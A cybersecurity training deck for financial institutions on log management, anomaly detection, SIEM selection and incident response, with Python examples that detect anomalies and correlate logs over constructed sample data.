[Diagram: log files gathered by a central log server]

• Obtain Management buy-in
• Define Policy for retention period of security and operational logs – sufficient for investigations
• Develop Procedures for performing log management, including requirements for:
– Log generation
– Transmission
– Storage and Retention
– Analysis
– Disposal
• Define and assign roles and responsibilities

The Elephant in the (server) Room

Log Retention and Storage


• Keep the original logs on the device they originate from, and a centralized copy pushed to an aggregation server
• Implement access restrictions to ensure integrity
• Best practice is to keep your logs for at least a year, with the goal to keep them “indefinitely” (Note: If in NY - a minimum 3yr retention required)
• Most breaches are discovered six or more months after initial compromise
• Storage costs have dropped dramatically


The Elephant in the (server) Room

Log Storage Costs


The cost of disk storage has dropped drastically over the last 10 years, and
hard drive sizes have grown steadily. It’s currently about 2¢ / GB.


The Elephant in the (server) Room

Log Compression
Logs are typically text, and text compresses very well. The example on this slide shows log compression from over 3 GB to 127 MB, an ~97% compression ratio.


Log Management Solutions

Design Considerations
• Centralized log storage
• Volume of log data to be processed
• Network bandwidth
• Online and offline data storage
• Security requirements for the data
• Time and resources needed for staff to analyze the logs
• PLAN FOR GROWTH
• In-house vs. outsourced


Log Management Solutions


Commercial Solutions
• Some examples:
– SolarWinds Log & Event Manager (LEM) - install available for Windows
– ManageEngine EventLog Analyzer - install available for Linux or Windows
– Splunk - install available for Linux or Windows
– AlienVault - available as a physical or virtual appliance
– Netwrix – available for Windows, VMware and cloud-based
• Out of the box, can ingest many log types/sources
• Typically offers robust alerting, analysis, retention mgmt., and security
• Typically expensive, $4000 and up (way up), plus annual maintenance
• Annual maintenance fees - but with maintenance, comes full support
• Typically user friendly


Log Management Solutions


Open Source Solutions
• Some examples:
– Logstash – install available for Linux or Windows.
– Nagios – install available for Linux, or as a virtual appliance
– Graylog – install available for Windows, Linux or as a virtual appliance
– LOGalyze - install available for Linux or Windows.
• Out of the box, can ingest many log types/sources
• Typically offers robust alerting, analysis, retention management, and security
• While the products themselves are free, some open source products offer paid support - pricing $2000 - $15,000 and up, annually
• May be complicated, but these are getting more user friendly and arguably on par with some commercial product features


Log Management Solutions


Syslog Solutions
• Some examples:
– Kiwi Syslog - install available for Windows
– Paessler PRTG - install available for Windows
– SnmpSoft Syslog Watcher - install available for Windows
– Linux - can be implemented with a Linux server using built-in tools (advanced users only)
• Logs are pushed to a server
• Limited to receiving messages in the syslog format (usually)
• Primarily found in networking equipment, but not in Windows systems
• Lacks basic security controls that would preserve the “CIA” of logs
– Security is available: RFC 3195 defines secure log delivery (tcp, TLS, etc.)


Log Management Solutions

Syslog Solutions
• Some examples:
– Kiwi Syslog - install available for Windows
– Paessler PRTG - install available for Windows
– SnmpSoft Syslog Watcher - install available for Windows
– Linux - can be implemented with a Linux server using built-in tools (advanced users only)
• Typically limited analysis and correlation; depends on the syslog server software
• Typically can be implemented quickly and cheaply (not many “features” to configure); commercial products are $200-$400


Log Management Solutions

Outsourced Solutions
• Some examples:
– Dell SecureWorks
– Gladiator (ProfitStars division of JHA)
– Alert Logic
• Vendor will typically place log collector in your environment and configure some internal systems to send logs to it
• You typically have little control over or access to this solution, and have to rely on the vendor’s alerting and reporting
• Typically expensive, “Call for quote!”
• CHECKBOX SOLUTION, but may make sense if you have limited in-house technical expertise


Log Management Solutions

Configuring Log Sources


• Configuring your syslog sources:
– Add the IP address of your syslog server and enable logging. There may be granularity settings for log verbosity, but the default is typically the best place to start.
• Configuring your Windows environment:
– Your log management solution may expect logs pushed to it, or it may be able to pull logs from Windows systems. Consult the vendor’s guidance for configuration.
– Windows environments allow for basic, as well as granular, logging. Typically, smaller environments will stick to basic settings; however, by default Windows doesn’t log everything considered important for forensics. Fortunately, it’s easy to configure logging on all domain joined systems via Active Directory Group Policy.


Audit Settings in Active Directory

For Log Management of Windows systems you must configure Active Directory “audit settings” to enable logging of various events (see “Audit Policy Settings.pdf” in course reference docs).

Audit policy                     Setting
Audit account logon events       Success, Failure
Audit account management         Success, Failure
Audit logon events               Success, Failure
Audit policy change              Success, Failure
Audit system events              Success, Failure
Audit directory service access   Success, Failure
Audit object access              Failure
Audit privilege use              Failure


Log Management

Review, Correlation and Alerting


• Manual analysis:
– Necessary for troubleshooting, incident response and other search needs
• Automated analysis:
– Correlation – finding relationships in log entries from multiple sources
– Alerting & notifications
• Necessary to handle volume of log data
• Systems parse info as ingested, generating alerts when events are detected
• Basic systems require manual creation of event detection
• Noise management and fatigue
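To make the correlation, alerting and noise-management bullets concrete, here is an added example (not part of the course material) that correlates failed logons from a VPN appliance syslog feed with Windows Security log entries for the same account, alerts when a run of failures is followed by a success, and suppresses duplicate alerts so the analyst is not paged twice for one incident. All events, account names, addresses, thresholds and window sizes are constructed for illustration.

```python
"""Correlation and alerting with noise suppression (added example, constructed data)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 3                          # failed logons before a later success is suspicious
CORRELATION_WINDOW = timedelta(minutes=10)  # failures older than this no longer count
SUPPRESSION_WINDOW = timedelta(minutes=30)  # one alert per (user, src_ip) in this period
TS = "%Y-%m-%d %H:%M:%S"

# Constructed sample events, normalized from two sources (a VPN appliance
# syslog feed and Windows Security events 4625/4624) into one record shape.
SAMPLE_EVENTS = [
    # source,   timestamp,             user,     src_ip,          outcome
    ("vpn",     "2019-03-04 02:01:10", "jsmith", "203.0.113.7",   "failure"),
    ("vpn",     "2019-03-04 02:01:25", "jsmith", "203.0.113.7",   "failure"),
    ("windows", "2019-03-04 02:02:02", "jsmith", "203.0.113.7",   "failure"),
    ("windows", "2019-03-04 02:03:40", "jsmith", "203.0.113.7",   "success"),  # alert
    ("windows", "2019-03-04 02:04:12", "jsmith", "203.0.113.7",   "success"),  # duplicate: suppressed
    ("windows", "2019-03-04 08:15:00", "mlee",   "10.1.2.33",     "failure"),  # one typo ...
    ("windows", "2019-03-04 08:15:09", "mlee",   "10.1.2.33",     "success"),  # ... is normal
    ("vpn",     "2019-03-04 09:00:00", "jsmith", "198.51.100.20", "failure"),
    ("vpn",     "2019-03-04 09:00:30", "jsmith", "198.51.100.20", "failure"),
    ("vpn",     "2019-03-04 09:01:00", "jsmith", "198.51.100.20", "failure"),
    ("windows", "2019-03-04 09:30:00", "jsmith", "198.51.100.20", "success"),  # outside window: no alert
]


def parse_event(source, ts, user, src_ip, outcome):
    """Turn one normalized tuple into a record with a real datetime."""
    return {"source": source, "time": datetime.strptime(ts, TS),
            "user": user, "src_ip": src_ip, "outcome": outcome}


def correlate(events, threshold=FAIL_THRESHOLD, window=CORRELATION_WINDOW,
              suppression=SUPPRESSION_WINDOW):
    """Return (alerts, suppressed_count) for the rule
    'threshold failed logons for an account within window, then a success'.
    Failures from any source count, so a VPN failure and a Windows failure
    for the same account are correlated into one picture."""
    failures = defaultdict(deque)   # user -> deque of (time, source) of recent failures
    last_alert = {}                 # (user, src_ip) -> time the last alert was emitted
    alerts, suppressed = [], 0
    for ev in sorted(events, key=lambda e: e["time"]):
        recent = failures[ev["user"]]
        while recent and ev["time"] - recent[0][0] > window:   # expire old failures
            recent.popleft()
        if ev["outcome"] == "failure":
            recent.append((ev["time"], ev["source"]))
            continue
        if len(recent) < threshold:
            continue                # a success after a typo or two is normal behaviour
        key = (ev["user"], ev["src_ip"])
        if key in last_alert and ev["time"] - last_alert[key] < suppression:
            suppressed += 1         # noise management: do not page the analyst twice
            continue
        last_alert[key] = ev["time"]
        alerts.append({
            "time": ev["time"].strftime(TS), "user": ev["user"], "src_ip": ev["src_ip"],
            "failures": len(recent),
            "sources": sorted({src for _, src in recent} | {ev["source"]}),
            "rule": "multiple failed logons followed by a successful logon",
        })
    return alerts, suppressed


def run_sample():
    """Correlate the constructed events; returns (alerts, suppressed_count)."""
    return correlate([parse_event(*e) for e in SAMPLE_EVENTS])


if __name__ == "__main__":
    found, dropped = run_sample()
    for a in found:
        print(f"ALERT {a['time']} user={a['user']} src={a['src_ip']} "
              f"failures={a['failures']} sources={','.join(a['sources'])}: {a['rule']}")
    print(f"{dropped} duplicate alert(s) suppressed")
```

Lowering the threshold or widening the window turns the “one typo” case into an alert, which is the tuning trade-off behind alert fatigue.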


Log Management
Resources
• https://technet.microsoft.com/en-us/sysinternals/sysmon
• http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf
• https://www.sans.org/reading-room/whitepapers/auditing/successful-siem-log-management-strategies-audit-compliance-33528
• https://support.solarwinds.com/?title=Success_Center/Log_%26_Event_Manager_(LEM)/Audit_Policies_and_Best_Practices_for_LEM
• https://technet.microsoft.com/en-us/library/dn487457.aspx
• https://www.ultimatewindowssecurity.com/wiki/WindowsSecuritySettings/OVERVIEW-Audit-Directory-Service-Access?Keywords=Audit+directory+service+access
• https://10dsecurity.com/cyber-security-baselines-anomaly-detection/


Section 4: Baselining and Anomaly Detection


Topics:
• Establishing “Normal”
• Identifying Abnormal
• Investigation
• Other Inputs to Consider
• Declaring an Incident

“Privacy may actually be an anomaly.”
- Vint Cerf


What is Anomaly Detection?

Anomalies are events that are unusual, or somehow out of the ordinary. Nearly all financial institutions already have one or more instances of anomaly detection in place, such as:
• Debit card fraud monitoring
• Internet banking – “velocity limits,” bill pay monitoring, etc.
• Check fraud detection

Though these are financial application or transaction oriented, the theory and operation are similar to a network anomaly detection process.


Anomaly Detection – Financial Transactions


Baseline Variables:
• Customer Name
• Customer Address
• Account Number
• Account Type
• Transaction Type
• Transaction Amt.
• Transaction Freq.

Analysis: Fraud Detection (Anomalies)

Anomalies:
• Accessing online banking from an unusual location or at an unusual time of day.
• Using online banking features not typically used.
• Using online banking features in an unexpected sequence.
• Changing personal information.
• Adding payees.
• Adding approvers or changing approval limits.
• Types and amounts of transactions.

Anomaly Detection – Financial Transactions


Is the user accessing online banking as expected?
– When
– Where
– How
Are user’s banking actions considered expected?
– Frequency
– Sequence
– Time
Are transactions expected?
– Transaction Type
– Amount
– Payee


Anomaly Detection – Physical Access


Baseline Variables:
• Restricted Area
• Unrestricted Area
• Day and Time
• Access Attempt
• Staff
• Managers
• Vendors
• Visitors
• Frequency
• ID Badge

Analysis: Detection (Anomalies)

Anomalies:
• Restricted area accessed by unauthorized staff.
• Restricted area accessed by authorized staff during off-hours.
• Changes to access approvals.
• Restricted area accessed by unknown/unapproved vendors.
• Approving access to unknown vendors.
• Change in access frequency by staff, managers, vendors, or visitors.
• Abnormal or missing ID badge.

Analysis – Where to Begin

[Figure: Gathering/Analysis pipeline diagram – Log Server receiving Log Files]

• Establish a “Baseline”
• Determine what to analyze*
• Identify what anomalies might look like
• Plan the response to an anomaly
• Implement anomaly detection
• Monitor
• Detect
• Refine the Process

* - Reference the IT Risk Assessment

Gathering Analysis – Baselining

Determine “normal behavior” using key attributes that can be monitored. The attributes must be able to provide accurate indicators that everything is functioning as designed and/or expected.

A baseline can be established for any number of systems or processes across the organization.

Note: Baselines are NOT static, and will change. Defining a reasonable period of time before the baseline must be re-established depends on the environment (e.g. frequency of changes, addition of new systems/products, staff, complexity, etc.).
Gathering Analysis – Resources

• Network Diagrams
• Data Flow Diagrams
• Firewall rules/ACLs/configurations
• User Account Permissions (Active Directory)
• Server usage ranges (performance metrics)
• Network usage ranges (performance metrics)
• Configuration documents

Inputs → Gathering Analysis

[Flowchart: assets (Server, Router, Workstation, Firewall, IDS, IPS, User Info, Database, Core, Helpdesk Tickets, etc.) send their log files to the Log Server. Decision: Activity seen before? If not, investigate whether there is a Material Impact; if there is, activate Incident Response.]
[Network diagram: Fedline, Internet, Core, Fileserver, Application Server]
Normal “Data Flow” is User Workstation → App Server → Core.
An anomaly “Data Flow” would be a User Workstation directly to the Core.
Another anomaly might be any communications from the App Server directly to the Internet.
Or a Fileserver or any User Workstation attempting an FTP session directly to the Internet.
Another anomaly might be an unauthorized User Workstation attempting to access Fedline.
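The five data-flow statements above can be expressed as a zone-to-zone baseline and checked against connection records. The script below is an added example, not course material: the zone address ranges, the web-only Internet access for workstations, the single authorized Fedline workstation and the flow records are all constructed.

```python
"""Data-flow baseline check for the course's example network (added example).

The normal path on the slides is User Workstation -> App Server -> Core, and
the anomalies are: workstation directly to Core, App Server to the Internet,
FTP from a fileserver or workstation to the Internet, and an unauthorized
workstation reaching Fedline. Zone address ranges, the web-only Internet
access for workstations, the authorized Fedline host and the flow records are
constructed so the script runs offline.
"""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

ANY = None  # marker: any destination port is acceptable for this zone pair

# Constructed zone assignments. In practice these come from the network and
# data flow diagrams listed under "Gathering Analysis - Resources".
ZONES = {
    "workstation": ipaddress.ip_network("192.168.68.0/24"),
    "app_server": ipaddress.ip_network("10.10.1.0/24"),
    "core": ipaddress.ip_network("10.10.2.0/24"),
    "fileserver": ipaddress.ip_network("10.10.3.0/24"),
    "fedline": ipaddress.ip_network("10.10.9.0/24"),
}

# Baseline of expected flows keyed by (source zone, destination zone), with
# the destination ports that are normal for that pair.
BASELINE = {
    ("workstation", "app_server"): ANY,
    ("app_server", "core"): ANY,
    ("workstation", "internet"): {80, 443},   # web browsing only (constructed)
    ("workstation", "fedline"): ANY,          # further limited by FEDLINE_AUTHORIZED
}

# Constructed: the only workstation approved to reach Fedline.
FEDLINE_AUTHORIZED = {"192.168.68.10"}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dst_port: int


def zone_of(ip: str) -> str:
    """Map an address to its zone; anything outside the internal ranges is 'internet'."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet"


def check_flow(flow: Flow) -> Optional[str]:
    """Return why the flow deviates from the baseline, or None if it is expected."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    pair = (src_zone, dst_zone)
    if pair not in BASELINE:
        return f"{src_zone} -> {dst_zone} is not a baselined data flow"
    allowed_ports = BASELINE[pair]
    if allowed_ports is not ANY and flow.dst_port not in allowed_ports:
        return f"{src_zone} -> {dst_zone} on port {flow.dst_port} is outside the baseline"
    if dst_zone == "fedline" and flow.src not in FEDLINE_AUTHORIZED:
        return f"{flow.src} is not authorized to access Fedline"
    return None


def find_anomalies(flows: Iterable[Flow]) -> List[Tuple[Flow, str]]:
    """Every flow that deviates from the baseline, paired with its reason."""
    results = []
    for flow in flows:
        reason = check_flow(flow)
        if reason:
            results.append((flow, reason))
    return results


# Constructed connection records mirroring the slides' scenarios.
SAMPLE_FLOWS = [
    Flow("192.168.68.55", "10.10.1.5", 8443),   # workstation -> app server: normal
    Flow("10.10.1.5", "10.10.2.5", 1521),       # app server -> core: normal
    Flow("192.168.68.55", "10.10.2.5", 1521),   # workstation -> core: anomaly
    Flow("10.10.1.5", "203.0.113.7", 443),      # app server -> Internet: anomaly
    Flow("10.10.3.5", "203.0.113.8", 21),       # fileserver FTP -> Internet: anomaly
    Flow("192.168.68.55", "203.0.113.8", 21),   # workstation FTP -> Internet: anomaly
    Flow("192.168.68.55", "203.0.113.9", 443),  # workstation HTTPS -> Internet: normal
    Flow("192.168.68.10", "10.10.9.2", 443),    # authorized workstation -> Fedline: normal
    Flow("192.168.68.55", "10.10.9.2", 443),    # unauthorized workstation -> Fedline: anomaly
]

if __name__ == "__main__":
    for flow, reason in find_anomalies(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dst_port}  {reason}")
```

Note that the FTP case from the fileserver is caught by the missing zone pair, while the same FTP session from a workstation is caught only by the port restriction: a baseline needs both the pair and the expected ports.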
Anomaly Examples
• Log file cleared
• “Never seen before” event types, internal IPs, users, etc.
• PowerShell running on a workstation
• Large deviations (1000%+ usually) up or down on metrics
• Unauthorized user attempts to log into a server/DB/app
• Authorized user logon at an unusual time
• Unauthorized user attempts to access restricted data
• Multiple failed logins from same account, multiple systems
• Web server accessed from different IP
• Multiple database requests occurring at unusual times
• Watch for IPv6 usage

Anomaly Examples - continued

• Admin access to DB/server/etc. from a user workstation
• Database server suddenly has a lot of outbound traffic
• Degraded network/server performance
• Observed protocols in use (be aware that malware can use encrypted comms or communicate over a port without using the actual protocol standard)
• Sudden uptick in firewall hits from another country
• Source IPs with a high number of unique destinations accessed (aka scan or sweep)
• One of your workstations is trying to connect to many other hosts (quickly)
• File server is unusually busy in the middle of the night when it is normally idle (not backups)
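Carrying the “Where to Begin” steps (baseline, define what the anomaly looks like, detect) through three of the examples on these two slides: a metric moving 1000%+ up or down, one account failing logons across several systems, and one source sweeping many hosts quickly. This is an added example rather than course code; metric names, thresholds and every record are constructed.

```python
"""Baseline-deviation checks for three of the listed anomalies (added example).

Checks constructed data for: a metric moving 1000% or more from its baseline
up or down, one account failing logons across several systems, and one source
reaching many unique destinations quickly (scan/sweep). Metric names,
thresholds and all records are constructed, not from the course.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class Metric:
    name: str
    baseline: float   # value established during the baselining period
    observed: float   # value in the current monitoring interval


def deviation_reason(m: Metric, pct: float = 1000.0) -> Optional[str]:
    """Flag a metric that moved pct percent or more away from its baseline.

    "Up" means observed >= baseline * (1 + pct/100); "down" is the mirror image,
    observed <= baseline / (1 + pct/100), so an elevenfold drop counts like an
    elevenfold rise. A zero baseline with a non-zero observation is a "never
    seen before" event, which the slides list as an anomaly in its own right.
    """
    factor = 1 + pct / 100
    if m.baseline == 0:
        return f"{m.name}: never seen before (observed {m.observed:g})" if m.observed else None
    if m.observed >= m.baseline * factor:
        return f"{m.name}: up {(m.observed / m.baseline - 1) * 100:.0f}% over baseline"
    if m.observed <= m.baseline / factor:
        return f"{m.name}: down to {m.observed / m.baseline * 100:.1f}% of baseline"
    return None


@dataclass(frozen=True)
class LogonEvent:
    ts: int          # epoch seconds
    account: str
    system: str      # host that recorded the attempt
    success: bool


def accounts_failing_on_multiple_systems(events: Iterable[LogonEvent],
                                         min_failures: int = 5,
                                         min_systems: int = 2) -> Dict[str, List[str]]:
    """Accounts with min_failures failed logons spread over min_systems hosts."""
    failures: Dict[str, List[str]] = defaultdict(list)
    for e in events:
        if not e.success:
            failures[e.account].append(e.system)
    return {acct: sorted(set(hosts)) for acct, hosts in failures.items()
            if len(hosts) >= min_failures and len(set(hosts)) >= min_systems}


@dataclass(frozen=True)
class Conn:
    ts: int
    src: str
    dst: str


def scanning_sources(conns: Iterable[Conn], min_unique_dsts: int = 20,
                     window: int = 60) -> List[str]:
    """Sources reaching min_unique_dsts distinct hosts within one window-second bucket."""
    buckets: Dict[tuple, set] = defaultdict(set)
    for c in conns:
        buckets[(c.src, c.ts // window)].add(c.dst)
    return sorted({src for (src, _), dsts in buckets.items() if len(dsts) >= min_unique_dsts})


# Constructed sample data; hosts and addresses are placeholders.
SAMPLE_METRICS = [
    Metric("fileserver_night_write_mb", 50, 1200),   # file server busy at 3 a.m.
    Metric("db_outbound_mb_per_hour", 2, 45),        # database server suddenly talkative
    Metric("web_requests_per_min", 400, 520),        # +30%: inside the baseline
    Metric("branch_vpn_sessions", 120, 6),           # collapse: degraded service
    Metric("ipv6_flows", 0, 17),                     # never seen before
]
SAMPLE_LOGONS = (
    [LogonEvent(1000 + i, "svc_backup", h, False)
     for i, h in enumerate(["DC01", "FS01", "APP01", "DC01", "FS01", "APP01"])]
    + [LogonEvent(1100 + i, "jdoe", "WS204", False) for i in range(3)]   # mistyped password
    + [LogonEvent(1200, "jdoe", "WS204", True)]
)
SAMPLE_CONNS = (
    [Conn(1200 + i, "192.168.68.55", f"10.10.2.{i}") for i in range(25)]  # 25 targets in 25 s
    + [Conn(1200 + i, "192.168.68.10", f"10.10.1.{i}") for i in range(3)]
)

if __name__ == "__main__":
    for m in SAMPLE_METRICS:
        reason = deviation_reason(m)
        if reason:
            print(reason)
    print(accounts_failing_on_multiple_systems(SAMPLE_LOGONS))
    print(scanning_sources(SAMPLE_CONNS))
```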

Exercise

Given what we have discussed to this point, and thinking about the hacking demos:
• List any anomalies that might have occurred and may have been detected if there had been monitoring in place.
• Where would you expect to find the anomaly information (e.g., firewall log, IPS, workstation event log, etc.)?

Log Management – Back to the Demo


Remember when Scott (victim) received an email with a rogue link to run:

Log Management – Back to the Demo


The log entry for when the suspect program was executed:

Log Management – Back to the Demo

The log entry for when the suspect program made initial contact to C&C:

Log Management – Back to the Demo

The log entry for when the suspect program connected to C&C:

Log Management – Back to the Demo

The log entry for PFRYE logging into DC from Workstation204 (192.168.68.55):

Log Management – Back to the Demo

The log entry for PFRYE logon to DC from Workstation204 (192.168.68.55):

Log Management – Back to the Demo

The log entry for scheduled task creation:

Log Management – Back to the Demo

The log entry details for scheduled task creation:
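The entries on the preceding demo slides become far more telling once a log server holds them side by side. The correlation below is an added example, not part of the course: it assumes Scott's workstation is Workstation204 (192.168.68.55) and that PFRYE's logon and the scheduled task both appear on the DC, and it constructs the process path, C&C address, firewall record format, timestamps and the FS01 host; the Windows Security event IDs used (4688, 4624, 4698, 1102) are the standard ones.

```python
"""Tying the demo's separate log entries into one chain (added example).

The demo slides show the entries one at a time: the suspect program running
on the victim's workstation, its first contact with C&C, PFRYE logging on to
the DC from Workstation204 (192.168.68.55), and a scheduled task being created.
Event IDs are the standard Windows Security log IDs (4688 process creation,
4624 logon, 4698 scheduled task created, 1102 audit log cleared). The firewall
record format, process path, task name, C&C address, timestamps and the FS01
host are constructed; only the names above come from the slides.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str       # system that wrote the entry
    kind: str       # Windows Security event ID as a string, or "fw_allow"
    data: dict = field(default_factory=dict)   # selected fields of the entry


def cleared_logs(events: List[Event]) -> List[str]:
    """Hosts whose Security log was cleared (1102): an anomaly on its own."""
    return sorted({e.host for e in events if e.kind == "1102"})


def find_chains(events: List[Event], window: timedelta = timedelta(hours=1)) -> List[dict]:
    """Process start on a workstation -> (optional) outbound contact from it ->
    network logon (LogonType 3) on another host from the workstation's address
    -> scheduled task created on that host, all inside `window`."""
    events = sorted(events, key=lambda e: e.ts)
    chains = []
    for p in (e for e in events if e.kind == "4688"):
        ws_ip = p.data["host_ip"]   # constructed field; normally from the asset inventory
        later = [e for e in events if p.ts < e.ts <= p.ts + window]
        c2 = next((e for e in later if e.kind == "fw_allow" and e.data["src"] == ws_ip), None)
        for lg in later:
            if (lg.kind != "4624" or lg.data.get("LogonType") != "3"
                    or lg.data.get("IpAddress") != ws_ip):
                continue
            task = next((e for e in later if e.kind == "4698"
                         and e.host == lg.host and e.ts > lg.ts), None)
            if task is None:
                continue
            chains.append({
                "workstation": p.host, "workstation_ip": ws_ip,
                "process": p.data["NewProcessName"],
                "c2": f"{c2.data['dst']}:{c2.data['dst_port']}" if c2 else None,
                "logon_user": lg.data["TargetUserName"], "target_host": lg.host,
                "task": task.data["TaskName"],
            })
    return chains


T0 = datetime(2019, 5, 7, 9, 12)   # constructed
SAMPLE_EVENTS = [
    Event(T0, "Workstation204", "4688", {"SubjectUserName": "scott",
          "NewProcessName": r"C:\Users\scott\Downloads\invoice.exe", "host_ip": "192.168.68.55"}),
    Event(T0 + timedelta(minutes=1), "firewall", "fw_allow",
          {"src": "192.168.68.55", "dst": "203.0.113.45", "dst_port": 443}),
    Event(T0 + timedelta(minutes=2), "DC", "4624",      # unrelated normal logon
          {"TargetUserName": "jdoe", "LogonType": "3", "IpAddress": "192.168.68.31"}),
    Event(T0 + timedelta(minutes=4), "DC", "4624",
          {"TargetUserName": "PFRYE", "LogonType": "3", "IpAddress": "192.168.68.55",
           "WorkstationName": "WORKSTATION204"}),
    Event(T0 + timedelta(minutes=6), "DC", "4698",
          {"SubjectUserName": "PFRYE", "TaskName": r"\Updater"}),
    Event(T0 + timedelta(minutes=30), "FS01", "1102", {"SubjectUserName": "PFRYE"}),
]

if __name__ == "__main__":
    for chain in find_chains(SAMPLE_EVENTS):
        print(chain)
    print("cleared logs on:", cleared_logs(SAMPLE_EVENTS))
```

Individually, each of these entries is easy to dismiss; the chain is what makes the sequence stand out, and the separate 1102 check covers the "log file cleared" anomaly from the examples list.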

Anomaly Detection
Inventory and gather all available system logs and determine
which ones are useful for monitoring baselines. For our
examples those might include:
• Active Directory - user activity
• Network usage reports
• Server performance reports
• IDS/IPS Firewall activity reports
• Antivirus reports
• Change Control logs
• User provisioning documentation
• Help Desk tickets

Other Anomaly Sources

Gather or otherwise be aware of “unstructured information” (e.g. voice communications, emails, user complaints, customer complaints, etc.).

Caution: Try not to initially prejudge or discount any information, as it may be useful at some later point.

TIP: Make a checklist of key logs, reports, and information to review on a regular basis. Also look for correlations between anomalies, and don’t be afraid to ask questions. All of this may be useful information for re-establishing baselines and/or filtering out false positives.


SIEM Systems

Log management, event detection and correlation are typically
accomplished through the use of a Security Information and
Event Management (SIEM) solution. These solutions have many
benefits, including log and event aggregation and correlation
across multiple systems and near real-time reporting. Most have
user-friendly and customizable formats (i.e., dashboard reports).


SIEM Systems

Few, if any, SIEM systems are “set and forget” solutions. Some
areas to be aware of before you implement a SIEM:
• Setup is often an involved and time-consuming process, though basic
functionality can usually be implemented easily.
• Ongoing review and tuning must occur to reduce false positives.
• Baseline data changes over time, and monitoring “rules” will need to be
revised to adapt to the new norms.
• Cost to implement can vary widely. From open source to enterprise-grade,
costs can range from nearly free to $20,000 or more.


SIEM Systems

A few SIEM examples:
• SolarWinds
• AlienVault
• Netwrix
• ManageEngine
• Splunk
• LogRhythm
• McAfee
• Sergeant Laboratories


SIEM Selection Considerations


• Integration of traditional logs with other event sources, such as Threat
Intel, Identity and Access Management (IAM) systems, Database Activity
Monitoring (DAM), NetFlow/DPI, File Integrity Monitoring and application
logging
• Summarization tables, reports and “widgets”
• Scalability, from SMB to large implementations
• Import and export of content (rules, reports, trends)
• Ability to create custom log source feeds
• Reusable and movable objects
• Health status monitoring
• Integration with a ticketing/workflow system or Configuration
Management Database (CMDB)


Inputs, Gathering, Analysis

[Flowchart: Inputs → Gathering → Analysis]

Inputs: assets such as a server, router, workstation and firewall/IDS/IPS,
each producing a log file, plus user info, database, core, help desk
tickets, etc.
Gathering: the log files are collected on a log server.
Analysis: Activity seen before? If no, investigate whether there is a
material impact. If there is a material impact, activate incident response.

Section 5: Incident Response


Topics:
• First Responder Actions
• Preservation of Evidence / Information
• Chain of Custody
• Handling of Mobile Devices

“It’s easier to implement cybersecurity than to deal with cyber-adversity.”


“It takes 20 years to build a reputation and few minutes of cyber-incident to
ruin it.”
- Stephane Nappo


Incident Response
From the FFIEC:
Financial institutions and their service providers should anticipate
potential cyber incidents and develop a framework to respond to these
incidents...
A financial institution experiencing a cyber attack may need to
simultaneously investigate an ongoing security incident and execute the
financial institution's recovery strategies. As a result, the financial
institution and TSP should consider identifying and making advance
arrangements for third-party forensic and incident management services.
Also, a financial institution relying on such third-party services should
plan for potential limited availability during a large-scale cyber event.
(IT Examination Handbook – Business Continuity Planning, 2015)


Incident Response Lifecycle


Incident Response

Containment – Things to avoid:

• Don’t shut down systems until you’ve collected evidence. Much evidence
may be lost, and the attacker may have altered the startup/shutdown
scripts/services to destroy evidence. In particular, do not shut the system
down until all volatile data (memory) has been collected.
• Once volatile data has been collected, pull the power plug to “freeze” the
system as-is.
• Don’t trust the programs on the system; they may have been
compromised. Run your evidence gathering from protected media.
• Don’t use programs that modify access times on files (e.g., “tar,” “xcopy”).


Order of Volatility

The "order of volatility" is simply the order and lifespan of digital
evidence. Understanding this concept is crucial in collecting the
right data in the right order before it disappears forever.


Order of Volatility

When collecting evidence you should begin with the most
volatile and proceed to the least volatile. The order of volatility,
from most to least, is:
• CPU cache and register contents
• System and network processes, routing tables and kernel statistics
• Swap files (page files) stored on local disk
• Data stored on local disks
• Logs stored on remote systems
• Archival media


Volatile Data - Memory Acquisition


Why capture live memory?
• Everything traverses RAM
• Processes & threads
• Network sockets, URLs, IP addresses
• Open files
• User content
• Passwords
• Clipboard
• Caches


Volatile Data - Memory Acquisition

• Registry contents (most, not all)
• Encryption keys
• Software configurations
• Hardware configurations
• Event logs (most, not all)
• Chat logs, private messages


Memory Analysis

• Malware cannot hide in memory like it can on disk
• Rootkits often can only be found through memory analysis
• Hidden processes are not hidden in memory
• New malware is “memory resident only”


Tools to Collect Memory - Examples

• FTK Imager (www.accessdata.com)
• Belkasoft RAM Capturer (belkasoft.com/ram-capturer)
• Dumpit (www.comae.io)
• Helix Pro (www.e-fense.com)
• WinPMEM (http://www.rekall-forensic.com/)
• Macquisition
(www.blackbagtech.com/software-products/macquisition-7/macquisition.html)

Note: You will need Local Admin access to run the tools.


FTK Imager (www.accessdata.com)

• The freeware version is part of a larger forensic suite
• Many options
• Can image drives as well
• GUI tool
• Was one of the first tools to capture memory
• Demo


Belkasoft RAM Capturer (belkasoft.com/ram-capturer)

• Freeware tool
• Designed to not be stopped by anti-forensics
• Simple to use
• Small footprint
• GUI tool


Dumpit (www.comae.io)

• Freeware tool
• Easiest tool to use, point and click
• No options
• Single purpose tool
• Small footprint
• GUI tool
• Demo


Helix Pro (www.e-fense.com)

• Pay-for-use software
• Collects more than just memory
• More options, but somewhat limited
• GUI tool
• Can be used to image drives as well


WinPMEM (www.rekall-forensic.com/)

• Open-source (free)
• Some technical expertise is required
• Command line only, with many options and parameters
• Enables compression by default
• Great for use with scripting
• Dumps loaded drivers by default
• Demo


Macquisition
(www.blackbagtech.com/software-products/macquisition-7/macquisition.html)

• Commercial (not free) tool
• Use for Apple macOS (formerly OS X) systems
• GUI tool


Forensic Toolbox - Building vs Buying

Building your own:
• Cheaper in licence cost, but not free: your staff's time goes into testing and
  maintenance
• Can customize what you want to collect
• Offers the most flexibility in collection
• Often a steep learning curve
• Must test, update, and maintain tools yourself (and re-validate after every
  tool or OS update)
• Support may be an issue


Forensic Toolbox - Building vs Buying

Buying a commercial toolkit:
• Costs can vary from $ to $$$$$$
• Sometimes limited to the vendor's workflow
• Often not as flexible
